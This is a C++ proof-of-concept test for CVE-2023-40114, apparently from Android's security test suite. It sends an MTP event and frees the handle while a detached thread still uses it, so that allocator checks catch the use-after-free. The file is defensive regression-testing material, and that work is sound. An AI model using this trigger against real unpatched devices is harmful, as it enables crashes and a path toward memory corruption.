1 /*
2  * Copyright (C) 2023 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <MtpFfsCompatHandle.h>
18 #include "../includes/common.h"
19 #include "../includes/memutils.h"
20 
using namespace android;
// Global mask selecting which allocator checks are active. It starts disabled
// and main() widens/narrows it around the handle allocation. Presumably read by
// the hooks installed via memutils.h (included above) — confirm against that header.
char enable_selective_overload = ENABLE_NONE;
23 
/*
 * PoC for CVE-2023-40114: issues an event through MtpFfsCompatHandle, then
 * closes and destroys the handle so that, on an unpatched build, the detached
 * thread spawned by sendEvent() runs against freed memory.
 *
 * argv[1]: path to the MTP control descriptor, opened O_RDWR.
 * Returns EXIT_SUCCESS; the use-after-free itself is expected to be caught by
 * the allocator checks selected through enable_selective_overload, not by any
 * check in this function. Whether close() releases controlFd is not visible
 * here — the fd is handed to the handle and never closed by main().
 */
int main(int argc, char* argv[]) {
    FAIL_CHECK(argc == 2);
    const char* const descriptorFilePath = argv[1];
    const int32_t controlFd = open(descriptorFilePath, O_RDWR | O_NONBLOCK | O_CLOEXEC);
    FAIL_CHECK(controlFd >= 0);

    // Empty event payload; only the act of sending matters for this test.
    struct mtp_event event;
    event.length = 0;
    event.data = const_cast<char*>("");

    {
        // Every allocator check is on only while the handle itself is allocated;
        // afterwards the mask is narrowed to the free/realloc checks that are
        // expected to catch the stale access from the detached thread.
        enable_selective_overload = ENABLE_ALL;
        std::unique_ptr<IMtpHandle> handle{new MtpFfsCompatHandle(controlFd)};
        enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;

        // sendEvent() performs the send via doSendEvent() on a detached thread.
        // close() and the end of this scope free the handle while that thread
        // may still be running; the fix makes close() wait for it to finish.
        handle->sendEvent(event);
        handle->close();
    }

    // Keep the process alive until the detached thread has had a chance to touch
    // the freed handle: ~200 ms was observed to suffice, 1 s leaves headroom for
    // slow devices.
    sleep(1);
    return EXIT_SUCCESS;
}